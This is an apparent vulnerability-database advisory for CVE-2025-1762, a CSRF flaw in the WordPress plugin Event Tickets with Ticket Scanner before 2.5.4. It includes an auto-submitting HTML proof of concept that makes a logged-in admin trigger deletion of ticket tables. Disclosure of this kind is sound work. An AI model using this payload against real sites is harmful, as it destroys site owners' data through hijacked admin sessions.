Event Tickets with Ticket Scanner < 2.5.4 – Arbitrary Tickets Deletion via CSRF | CVE 2025-1762 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Have an admin open the following HTML:

``
<html>
  <body>
    <form action="http://example.com/wp-admin/admin-ajax.php">
      <input type="hidden" name="nonce" value="1" />
      <input type="hidden" name="action" value="sasoEventtickets&#95;executeAdminSettings" />
      <input type="hidden" name="a&#95;sngmbh" value="emptyTableCodes" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Affects Plugins

event-tickets-with-ticket-scanner

Fixed in 2.5.4

References

CVE

URL

https://research.cleantalk.org/CVE-2025-1762/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Krugov Artyom

Submitter

Krugov Aryom

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

d5cefdee-2ba0-465d-b176-0dff39fc322c

Timeline

Publicly Published

2025-03-06 (about 10 months ago)

Added

2025-03-06 (about 10 months ago)

Last Updated

2025-03-06 (about 10 months ago)

Other

Published

Title

Published

2017-03-06

Title

WordPress 4.2-4.7.2 - Press This CSRF DoS

Published

2025-12-04

Title

Norby AI <= 1.0.3 - Cross-Site Request Forgery to Settings Update

Published

2025-12-02

Title

ShopEngine < 4.8.6 - Cross-Site Request Forgery to Wishlist Manipulation

Published

2025-12-04

Title

Quantic Social Image Hover <= 1.0.8 - Cross-Site Request Forgery to Settings Update

Published

2015-06-15

Title

Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)